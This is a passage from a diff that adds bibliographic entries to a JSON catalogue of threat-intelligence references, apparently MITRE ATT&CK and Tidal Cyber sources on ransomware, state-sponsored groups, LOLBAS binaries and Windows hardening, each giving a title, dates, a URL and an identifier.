}, + { + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2018-04-20T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + ], + "source": "MITRE", + "title": "Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices" + }, + "related": [], + "uuid": "8fdf280d-680f-4b8f-8fb9-6b3118ec3983", + "value": "US-CERT TA18-106A Network Infrastructure Devices 2018" + }, + { + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", + "meta": { + "date_accessed": "2022-04-05T00:00:00Z", + "date_published": "2022-04-05T00:00:00Z", + "refs": [ + "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + ], + "source": "MITRE", + "title": "Russia's FSB malign activity: factsheet" + }, + "related": [], + "uuid": "27e7d347-9d85-4897-9e04-33f58acc5687", + "value": "UK GOV FSB Factsheet April 2022" + }, + { + "description": "Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.", + "meta": { + "date_accessed": "2022-02-21T00:00:00Z", + "date_published": "2022-02-03T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/" + ], + "source": "MITRE", + "title": "Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine" + }, + "related": [], + "uuid": "a5df39b2-77f8-4814-8198-8620655aa79b", + "value": "Unit 42 Gamaredon February 2022" + }, + { + "description": "Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.", + "meta": { + "date_accessed": "2023-03-22T00:00:00Z", + "date_published": "2022-11-10T00:00:00Z", + "refs": [ + "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/" + ], + "source": "MITRE", + "title": "Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless" + }, + "related": [], + "uuid": "28c53a97-5500-5bfb-8aac-3c0bf94c2dfe", + "value": "Wired Russia Cyberwar" + }, + { + "description": "RyanW3stman. (2023, October 10). RyanW3stman Tweet October 10 2023. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-10-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/RyanW3stman/status/1711732225996165135" + ], + "source": "Tidal Cyber", + "title": "RyanW3stman Tweet October 10 2023" + }, + "related": [], + "uuid": "cfd0ad64-54b2-446f-9624-9c90a9a94f52", + "value": "RyanW3stman Tweet October 10 2023" + }, + { + "description": "The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2020-10-18T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/" + ], + "source": "MITRE", + "title": "Ryuk in 5 Hours" + }, + "related": [], + "uuid": "892150f4-769d-447d-b652-e5d85790ee37", + "value": "DFIR Ryuk in 5 Hours October 2020" + }, + { + "description": "ANSSI. (2021, February 25). RYUK RANSOMWARE. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "date_published": "2021-02-25T00:00:00Z", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf" + ], + "source": "MITRE", + "title": "RYUK RANSOMWARE" + }, + "related": [], + "uuid": "0a23be83-3438-4437-9e51-0cfa16a00d57", + "value": "ANSSI RYUK RANSOMWARE" + }, + { + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", + "meta": { + "date_accessed": "2021-02-11T00:00:00Z", + "date_published": "2021-01-14T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/" + ], + "source": "MITRE", + "title": "Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices" + }, + "related": [], + "uuid": "f6670b73-4d57-4aad-8264-1d42d585e280", + "value": "Bleeping Computer - Ryuk WoL" + }, + { + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "meta": { + "date_accessed": "2020-11-06T00:00:00Z", + "date_published": "2020-11-05T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" + ], + "source": "MITRE", + "title": "Ryuk Speed Run, 2 Hours to Ransom" + }, + "related": [], + "uuid": "3b904516-3b26-4caa-8814-6e69b76a7c8c", + "value": "DFIR Ryuk 2 Hour Speed Run November 2020" + }, + { + "description": "The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020.", + "meta": { + "date_accessed": "2020-10-09T00:00:00Z", + "date_published": "2020-10-08T00:00:00Z", + "refs": [ + "https://thedfirreport.com/2020/10/08/ryuks-return/" + ], + "source": "MITRE", + "title": "Ryuk’s Return" + }, + "related": [], + "uuid": "eba1dafb-ff62-4d34-b268-3b9ba6a7a822", + "value": "DFIR Ryuk's Return October 2020" + }, + { + "description": "Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/" + ], + "source": "MITRE", + "title": "S3 Ransomware Part 1: Attack Vector" + }, + "related": [], + "uuid": "bb28711f-186d-4101-b153-6340ce826343", + "value": "Rhino S3 Ransomware Part 1" + }, + { + "description": "Gietzen, S. (n.d.). S3 Ransomware Part 2: Prevention and Defense. Retrieved April 14, 2021.", + "meta": { + "date_accessed": "2021-04-14T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/" + ], + "source": "MITRE", + "title": "S3 Ransomware Part 2: Prevention and Defense" + }, + "related": [], + "uuid": "a2b3e738-257c-4078-9fde-d55b08c8003b", + "value": "Rhino S3 Ransomware Part 2" + }, + { + "description": "Travis Clarke. (2020, March 21). S3Recon GitHub. Retrieved March 4, 2022.", + "meta": { + "date_accessed": "2022-03-04T00:00:00Z", + "date_published": "2020-03-21T00:00:00Z", + "refs": [ + "https://github.com/clarketm/s3recon" + ], + "source": "MITRE", + "title": "S3Recon GitHub" + }, + "related": [], + "uuid": "803c51be-a54e-4fab-8ea0-c6bef18e84d3", + "value": "S3Recon GitHub" + }, + { + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.", + "meta": { + "date_accessed": "2016-01-26T00:00:00Z", + "date_published": "2015-07-30T00:00:00Z", + "refs": [ + "http://www.secureworks.com/cyber-threat-intelligence/threats/sakula-malware-family/" + ], + "source": "MITRE", + "title": "Sakula Malware Family" + }, + "related": [], + "uuid": "e9a2ffd8-7aed-4343-8678-66fc3e758d19", + "value": "Dell Sakula" + }, + { + "description": "Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "refs": [ + "https://source.winehq.org/WineAPI/samlib.html" + ], + "source": "MITRE", + "title": "samlib.dll" + }, + "related": [], + "uuid": "d0fdc669-959c-42ed-be5d-386a4e90a897", + "value": "Wine API samlib.dll" + }, + { + "description": "Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.", + "meta": { + "date_accessed": "2019-04-15T00:00:00Z", + "date_published": "2018-04-01T00:00:00Z", + "refs": [ + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf" + ], + "source": "MITRE", + "title": "SamSam Ransomware Chooses Its Targets Carefully" + }, + "related": [], + "uuid": "4da5e9c3-7205-4a6e-b147-be7c971380f0", + "value": "Sophos SamSam Apr 2018" + }, + { + "description": "Symantec Security Response Attack Investigation Team. (2018, October 30). SamSam: Targeted Ransomware Attacks Continue. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2018-10-30T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks" + ], + "source": "MITRE", + "title": "SamSam: Targeted Ransomware Attacks Continue" + }, + "related": [], + "uuid": "c5022a91-bdf4-4187-9967-dfe6362219ea", + "value": "Symantec SamSam Oct 2018" + }, + { + "description": "Ventura, V. (2018, January 22). SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks. Retrieved April 16, 2019.", + "meta": { + "date_accessed": "2019-04-16T00:00:00Z", + "date_published": "2018-01-22T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" + ], + "source": "MITRE", + "title": "SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks" + }, + "related": [], + "uuid": "0965bb64-be96-46b9-b60f-6829c43a661f", + "value": "Talos SamSam Jan 2018" + }, + { + "description": "ANSSI. (2021, January 27). SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS. Retrieved March 30, 2021.", + "meta": { + "date_accessed": "2021-03-30T00:00:00Z", + "date_published": "2021-01-27T00:00:00Z", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" + ], + "source": "MITRE", + "title": "SANDWORM INTRUSION SET CAMPAIGN TARGETING CENTREON SYSTEMS" + }, + "related": [], + "uuid": "5e619fef-180a-46d4-8bf5-998860b5ad7e", + "value": "ANSSI Sandworm January 2021" + }, + { + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "meta": { + "date_accessed": "2017-10-06T00:00:00Z", + "date_published": "2016-01-07T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + ], + "source": "MITRE", + "title": "Sandworm Team and the Ukrainian Power Authority Attacks" + }, + "related": [], + "uuid": "63622990-5467-42b2-8f45-b675dfc4dc8f", + "value": "iSIGHT Sandworm 2014" + }, + { + "description": "DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco’s Network. Retrieved December 15, 2020.", + "meta": { + "date_accessed": "2020-12-15T00:00:00Z", + "date_published": "2020-08-26T00:00:00Z", + "refs": [ + "https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network" + ], + "source": "MITRE", + "title": "San Jose Man Pleads Guilty To Damaging Cisco’s Network" + }, + "related": [], + "uuid": "b8d9006d-7466-49cf-a70e-384edee530ce", + "value": "DOJ - Cisco Insider" + }, + { + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2014-08-28T00:00:00Z", + "refs": [ + "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + ], + "source": "MITRE", + "title": "Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks" + }, + "related": [], + "uuid": "48753fc9-b7b7-465f-92a7-fb3f51b032cb", + "value": "ATT ScanBox" + }, + { + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-07-13T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + ], + "source": "MITRE", + "title": "SCANdalous! (External Detection Using Network Scan Data and Automation)" + }, + "related": [], + "uuid": "3a60f7de-9ead-444e-9d08-689c655b26c7", + "value": "Mandiant SCANdalous Jul 2020" + }, + { + "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2019-05-13T00:00:00Z", + "refs": [ + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/" + ], + "source": "MITRE", + "title": "ScarCruft continues to evolve, introduces Bluetooth harvester" + }, + "related": [], + "uuid": "2dd5b872-a4ab-4b77-8457-a3d947298fc0", + "value": "Securelist ScarCruft May 2019" + }, + { + "description": "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12, 2023.", + "meta": { + "date_accessed": "2023-07-12T00:00:00Z", + "date_published": "2023-07-11T00:00:00Z", + "refs": [ + "https://sysdig.com/blog/scarleteel-2-0/" + ], + "source": "MITRE", + "title": "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto" + }, + "related": [], + "uuid": "90e60242-82d8-5648-b7e4-def6fd508e16", + "value": "Sysdig ScarletEel 2.0" + }, + { + "description": "Alessandro Brucato. (2023, July 11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "date_published": "2023-07-11T00:00:00Z", + "refs": [ + "https://sysdig.com/blog/scarleteel-2-0/" + ], + "source": "MITRE", + "title": "SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto" + }, + "related": [], + "uuid": "285266e7-7a62-5f98-9b0f-fefde4b21c88", + "value": "Sysdig ScarletEel 2.0 2023" + }, + { + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "meta": { + "date_accessed": "2016-02-10T00:00:00Z", + "date_published": "2016-01-24T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists" + }, + "related": [], + "uuid": "f84a5b6d-3af1-45b1-ac55-69ceced8735f", + "value": "Scarlet Mimic Jan 2016" + }, + { + "description": "CrowdStrike. (n.d.). Scattered Spider. Retrieved July 5, 2023.", + "meta": { + "date_accessed": "2023-07-05T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/adversaries/scattered-spider/" + ], + "source": "MITRE", + "title": "Scattered Spider" + }, + "related": [], + "uuid": "a865a984-7f7b-5f82-ac4a-6fac79a2a753", + "value": "CrowdStrike Scattered Spider Profile" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, November 16). Scattered Spider. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "date_published": "2023-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a" + ], + "source": "Tidal Cyber", + "title": "Scattered Spider" + }, + "related": [], + "uuid": "9c242265-c28c-4580-8e6a-478d8700b092", + "value": "U.S. CISA Scattered Spider November 16 2023" + }, + { + "description": "CrowdStrike. (2023, January 10). SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security. Retrieved July 5, 2023.", + "meta": { + "date_accessed": "2023-07-05T00:00:00Z", + "date_published": "2023-01-10T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/" + ], + "source": "MITRE", + "title": "SCATTERED SPIDER Exploits Windows Security Deficiencies with Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security" + }, + "related": [], + "uuid": "d7d86f5d-1f02-54b0-b6f4-879878563245", + "value": "CrowdStrike Scattered Spider BYOVD January 2023" + }, + { + "description": "LOLBAS. (2018, May 25). Sc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Sc/" + ], + "source": "Tidal Cyber", + "title": "Sc.exe" + }, + "related": [], + "uuid": "5ce3ef73-f789-4939-a60e-e0a373048bda", + "value": "Sc.exe - LOLBAS Project" + }, + { + "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2015-11-03T00:00:00Z", + "refs": [ + "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" + ], + "source": "MITRE", + "title": "Scheduled Tasks History Retention settings" + }, + "related": [], + "uuid": "63e53238-30b5-46ef-8083-7d2888b01561", + "value": "TechNet Forum Scheduled Task Operational Setting" + }, + { + "description": "Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.", + "meta": { + "date_accessed": "2019-12-03T00:00:00Z", + "date_published": "2019-09-07T00:00:00Z", + "refs": [ + "https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/" + ], + "source": "MITRE", + "title": "Scheduling tasks using at command in Linux" + }, + "related": [], + "uuid": "dbab6766-ab87-4528-97e5-cc3121aa77b9", + "value": "Kifarunix - Task Scheduling in Linux" + }, + { + "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.", + "meta": { + "date_accessed": "2016-04-28T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/bb490996.aspx" + ], + "source": "MITRE", + "title": "Schtasks" + }, + "related": [], + "uuid": "17c03e27-222d-41b5-9fa2-34f0939e5371", + "value": "TechNet Schtasks" + }, + { + "description": "LOLBAS. (2018, May 25). Schtasks.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Schtasks/" + ], + "source": "Tidal Cyber", + "title": "Schtasks.exe" + }, + "related": [], + "uuid": "2ef31677-b7ec-4200-a342-7c9196e1aa58", + "value": "Schtasks.exe - LOLBAS Project" + }, + { + "description": "Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.", + "meta": { + "date_accessed": "2017-12-05T00:00:00Z", + "date_published": "2017-11-22T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Screensaver" + ], + "source": "MITRE", + "title": "Screensaver" + }, + "related": [], + "uuid": "b5d69465-27df-4acc-b6cc-f51be8780b7b", + "value": "Wikipedia Screensaver" + }, + { + "description": "Strategic Cyber, LLC. (n.d.). Scripted Web Delivery. Retrieved January 23, 2018.", + "meta": { + "date_accessed": "2018-01-23T00:00:00Z", + "refs": [ + "https://www.cobaltstrike.com/help-scripted-web-delivery" + ], + "source": "MITRE", + "title": "Scripted Web Delivery" + }, + "related": [], + "uuid": "89ed4c93-b69d-4eed-8212-cd2ebee08bcb", + "value": "CobaltStrike Scripted Web Delivery" + }, + { + "description": "Mudge, R. (2017, January 24). Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-01-24T00:00:00Z", + "refs": [ + "https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/" + ], + "source": "MITRE", + "title": "Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique" + }, + "related": [], + "uuid": "ccafe7af-fbb3-4478-9035-f588e5e3c8b8", + "value": "Cobalt Strike DCOM Jan 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Scriptrunner.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/" + ], + "source": "Tidal Cyber", + "title": "Scriptrunner.exe" + }, + "related": [], + "uuid": "805d16cc-8bd0-4f80-b0ac-c5b5df51427c", + "value": "Scriptrunner.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2021, January 7). Scrobj.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-01-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Scrobj/" + ], + "source": "Tidal Cyber", + "title": "Scrobj.dll" + }, + "related": [], + "uuid": "c50ff71f-c742-4d63-a18e-e1ce41d55193", + "value": "Scrobj.dll - LOLBAS Project" + }, + { + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", + "meta": { + "date_accessed": "2018-02-08T00:00:00Z", + "date_published": "2016-07-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + ], + "source": "MITRE", + "title": "SDelete v2.0" + }, + "related": [], + "uuid": "356c7d49-5abc-4566-9657-5ce58cf7be67", + "value": "Microsoft SDelete July 2016" + }, + { + "description": "Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2019-05-09T00:00:00Z", + "refs": [ + "https://twitter.com/PyroTek3/status/1126487227712921600/photo/1" + ], + "source": "MITRE", + "title": "Sean Metcalf Twitter" + }, + "related": [], + "uuid": "c7482430-58f9-4365-a7c6-d17067b257e4", + "value": "Sean Metcalf Twitter DNS Records" + }, + { + "description": "Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances. Retrieved June 17, 2020.", + "meta": { + "date_accessed": "2020-06-17T00:00:00Z", + "refs": [ + "https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/" + ], + "source": "MITRE", + "title": "Search CloudTrail logs for API calls to EC2 Instances" + }, + "related": [], + "uuid": "636b933d-8953-4579-980d-227527dfcc94", + "value": "AWS CloudTrail Search" + }, + { + "description": "Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2017-08-15T00:00:00Z", + "refs": [ + "https://www.group-ib.com/blog/cobalt" + ], + "source": "MITRE", + "title": "Secrets of Cobalt" + }, + "related": [], + "uuid": "2d9ef1de-2ee6-4500-a87d-b55f83e65900", + "value": "Group IB Cobalt Aug 2017" + }, + { + "description": "NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "date_published": "2017-04-20T00:00:00Z", + "refs": [ + "https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard" + ], + "source": "MITRE", + "title": "Secure Host Baseline - Credential Guard" + }, + "related": [], + "uuid": "11bb1f9b-53c1-4738-ab66-56522f228743", + "value": "GitHub SHB Credential Guard" + }, + { + "description": "National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.", + "meta": { + "date_accessed": "2016-06-22T00:00:00Z", + "date_published": "2016-05-04T00:00:00Z", + "refs": [ + "https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET" + ], + "source": "MITRE", + "title": "Secure Host Baseline EMET" + }, + "related": [], + "uuid": "00953d3e-5fe7-454a-8d01-6405f74cca80", + "value": "Secure Host Baseline EMET" + }, + { + "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.", + "meta": { + "date_accessed": "2020-04-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process" + ], + "source": "MITRE", + "title": "Secure the Windows 10 boot process" + }, + "related": [], + "uuid": "3f0ff65d-56a0-4c29-b561-e6342b0b6b65", + "value": "TechNet Secure Boot Process" + }, + { + "description": "SecureWorks. (2019, August 27) LYCEUM Takes Center Stage in Middle East Campaign. Retrieved November 19, 2019", + "meta": { + "date_accessed": "2019-11-19T00:00:00Z", + "date_published": "2019-08-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" + ], + "source": "MITRE", + "title": "SecureWorks August 2019" + }, + "related": [], + "uuid": "573edbb6-687b-4bc2-bc4a-764a548633b5", + "value": "SecureWorks August 2019" + }, + { + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "meta": { + "date_accessed": "2017-07-08T00:00:00Z", + "date_published": "2012-03-21T00:00:00Z", + "refs": [ + "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory" + ], + "source": "MITRE", + "title": "Securing .bash_history file" + }, + "related": [], + "uuid": "15280399-e9c8-432c-8ee2-47ced9377378", + "value": "Securing bash history" + }, + { + "description": "Plett, C., Poggemeyer, L. (2012, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "date_published": "2012-10-26T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + ], + "source": "MITRE", + "title": "Securing Privileged Access Reference Material" + }, + "related": [], + "uuid": "716844d6-a6ed-41d4-9067-3822ed32828f", + "value": "Microsoft Securing Privileged Access" + }, + { + "description": "Berkeley Security, University of California. (n.d.). Securing Remote Desktop for System Administrators. Retrieved November 4, 2014.", + "meta": { + "date_accessed": "2014-11-04T00:00:00Z", + "refs": [ + "https://security.berkeley.edu/node/94" + ], + "source": "MITRE", + "title": "Securing Remote Desktop for System Administrators" + }, + "related": [], + "uuid": "98bdf25b-fbad-497f-abd2-8286d9e0479c", + "value": "Berkley Secure" + }, + { + "description": "Cisco. (2006, May 10). Securing Simple Network Management Protocol. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2006-05-10T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/support/docs/ip/simple-network-management-protocol-snmp/20370-snmpsecurity-20370.html" + ], + "source": "MITRE", + "title": "Securing Simple Network Management Protocol" + }, + "related": [], + "uuid": "31de3a32-ae7a-42bf-9153-5d891651a7d1", + "value": "Cisco Securing SNMP" + }, + { + "description": "Metcalf, S. (2016, October 21). Securing Windows Workstations: Developing a Secure Baseline. Retrieved November 17, 2017.", + "meta": { + "date_accessed": "2017-11-17T00:00:00Z", + "date_published": "2016-10-21T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=3299" + ], + "source": "MITRE", + "title": "Securing Windows Workstations: Developing a Secure Baseline" + }, + "related": [], + "uuid": "078b9848-8e5f-4750-bb90-3e110876a6a4", + "value": "ADSecurity Windows Secure Baseline" + }, + { + "description": "Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.", + "meta": { + "date_accessed": "2019-06-13T00:00:00Z", + "date_published": "2019-06-10T00:00:00Z", + "refs": [ + "http://blog.morphisec.com/security-alert-fin8-is-back" + ], + "source": "MITRE", + "title": "SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY" + }, + "related": [], + "uuid": "1b6ce918-651a-480d-8305-82bccbf42e96", + "value": "Morphisec ShellTea June 2019" + }, + { + "description": "Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2016-09-23T00:00:00Z", + "refs": [ + "https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/" + ], + "source": "MITRE", + "title": "Security Alert Summary" + }, + "related": [], + "uuid": "bed8ae68-9738-46fb-abc9-0004fa35636a", + "value": "Carbon Black Obfuscation Sept 2016" + }, + { + "description": "Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.", + "meta": { + "date_accessed": "2021-10-06T00:00:00Z", + "date_published": "2013-12-23T00:00:00Z", + "refs": [ + "http://lists.openstack.org/pipermail/openstack/2013-December/004138.html" + ], + "source": "MITRE", + "title": "Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!" + }, + "related": [], + "uuid": "255181c2-b1c5-4531-bc16-853f21bc6435", + "value": "Havana authentication bug" + }, + { + "description": "Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.", + "meta": { + "date_accessed": "2017-11-30T00:00:00Z", + "date_published": "2014-11-19T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/cc755321.aspx" + ], + "source": "MITRE", + "title": "Security Considerations for Trusts" + }, + "related": [], + "uuid": "01ddd53c-1f02-466d-abf2-43bf1ab2d3fc", + "value": "Microsoft Trust Considerations Nov 2014" + }, + { + "description": "Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.", + "meta": { + "date_accessed": "2021-10-13T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + "source": "MITRE", + "title": "Security groups for your VPC" + }, + "related": [], + "uuid": 